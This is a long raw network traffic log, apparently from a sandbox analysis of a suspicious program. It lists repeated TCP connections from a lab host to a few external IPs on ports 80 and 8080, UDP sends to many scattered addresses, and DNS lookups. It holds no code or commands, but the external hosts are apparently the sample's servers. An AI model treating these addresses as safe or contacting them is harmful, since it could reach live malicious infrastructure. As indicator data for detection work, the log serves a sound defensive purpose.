                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003473997 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003510952 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003518105 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.237066984 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.242134094 CEST808050043190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.242247105 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.275511980 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.280626059 CEST808050043190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.544055939 CEST500438080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.143539906 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.143891096 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.148878098 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.148982048 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.149360895 CEST8050042185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.149420977 CEST5004280192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.174968958 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.179874897 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244339943 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244394064 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244421959 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244427919 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244457960 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244462967 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244466066 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244498014 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.502796888 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.509155035 CEST808050045190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.509257078 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.549698114 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.554915905 CEST808050045190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:44.568350077 CEST500458080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.191087961 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.191416979 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196288109 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196382999 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196594000 CEST8050044185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.196644068 CEST5004480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.237698078 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.242605925 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.880283117 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885282040 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885485888 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885612011 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.890412092 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270262003 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270283937 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270302057 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270313025 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270314932 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270333052 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270370007 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.503979921 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.508945942 CEST808050048190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.509043932 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.521785975 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.526837111 CEST808050048190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:51.551465988 CEST500488080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.129128933 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.129645109 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134634972 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134649992 CEST8050046185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134725094 CEST5004680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.134740114 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.174532890 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.179536104 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.925184011 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.017759085 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.123960018 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.124047995 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.130570889 CEST5004780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.135442019 CEST8050047194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223341942 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223366976 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223381996 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223460913 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223500967 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.637419939 CEST500508080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.642405987 CEST808050050190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.642469883 CEST500508080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.642582893 CEST500508080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.647576094 CEST808050050190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:57.651691914 CEST500508080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.044742107 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.045064926 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.050813913 CEST8050049185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.051374912 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.051445007 CEST5004980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.051496029 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.051703930 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.057674885 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153179884 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153238058 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153280020 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153316021 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153332949 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153379917 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.218745947 CEST500528080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.225430965 CEST808050052190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.225545883 CEST500528080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.245826960 CEST500528080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.251111984 CEST808050052190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.284445047 CEST500528080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.721878052 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.722181082 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.727205038 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.727304935 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.728904963 CEST8050051185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.729039907 CEST5005180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.738311052 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:03.743294001 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962414026 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962460041 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962475061 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.962591887 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.964313030 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.966932058 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.442303896 CEST500548080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.454047918 CEST808050054190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.457093954 CEST500548080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.488503933 CEST500548080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.503032923 CEST808050054190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:09.512490034 CEST500548080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.026602983 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.026942968 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.033293962 CEST8050053185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.033322096 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.033353090 CEST5005380192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.033418894 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.036904097 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.056204081 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223932028 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223968983 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.223989010 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.224025965 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.224070072 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.828279018 CEST500568080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.884006977 CEST808050056190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.884161949 CEST500568080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.938774109 CEST500568080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:11.943773031 CEST808050056190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:15.957814932 CEST500568080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.502567053 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.502826929 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.529428005 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.529561996 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.531120062 CEST8050055185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.531183958 CEST5005580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.550440073 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:16.555803061 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699736118 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699767113 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699784040 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699820995 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.699868917 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.893649101 CEST500588080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.908247948 CEST808050058190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.908341885 CEST500588080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.932123899 CEST500588080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:17.937992096 CEST808050058190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.957273006 CEST500588080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.440468073 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.440767050 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.448754072 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.448846102 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.449258089 CEST8050057185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.449321032 CEST5005780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.511851072 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.518661022 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641213894 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641271114 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641330004 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641333103 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641380072 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641380072 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641710997 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.641753912 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.686472893 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.716403008 CEST808050060190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.716497898 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.722795963 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:23.756277084 CEST808050060190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:27.761667967 CEST500608080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.226284027 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.226587057 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231607914 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231695890 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.231964111 CEST8050059185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.232024908 CEST5005980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.268994093 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.274990082 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.316989899 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317040920 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317079067 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317114115 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317116022 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317194939 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.317195892 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.627974987 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.633363008 CEST808050062190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.633445978 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.672257900 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:29.680347919 CEST808050062190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.003213882 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008198023 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008270979 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.008384943 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.013412952 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.211025953 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.216461897 CEST8050061185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.216552019 CEST5006180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.753047943 CEST500628080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.945825100 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.951687098 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.951759100 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.067480087 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.072963953 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073040009 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073067904 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073091984 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073106050 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073122025 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073156118 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:36.073224068 CEST5006480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:38.939764023 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:38.986659050 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:39.113240957 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:39.113332987 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:42.179964066 CEST5006380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:42.184865952 CEST8050063194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:51.213104010 CEST8050064185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:51.213186979 CEST5006480192.168.2.9185.53.178.50

                                                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:30.928544998 CEST555961473192.168.2.994.76.206.19
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:31.455005884 CEST555975683192.168.2.946.45.148.196
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:32.702570915 CEST555985750192.168.2.983.222.184.130
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:32.859656096 CEST555995010192.168.2.958.140.114.152
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.372383118 CEST556004630192.168.2.980.178.242.19
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.716404915 CEST6019553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.781296015 CEST53601951.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.985239029 CEST601966800192.168.2.961.95.152.112
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.493061066 CEST601977066192.168.2.9220.94.117.230
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.125363111 CEST601984840192.168.2.958.85.93.82
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.760185003 CEST5165953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.803855896 CEST53516591.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.805519104 CEST6147653192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.858596087 CEST53614761.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.860176086 CEST6229853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.925499916 CEST53622981.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.940160990 CEST5013753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.973551989 CEST53501371.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.975197077 CEST6078053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.990966082 CEST53607801.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.995835066 CEST6247653192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.042836905 CEST6247653192.168.2.9178.17.170.133
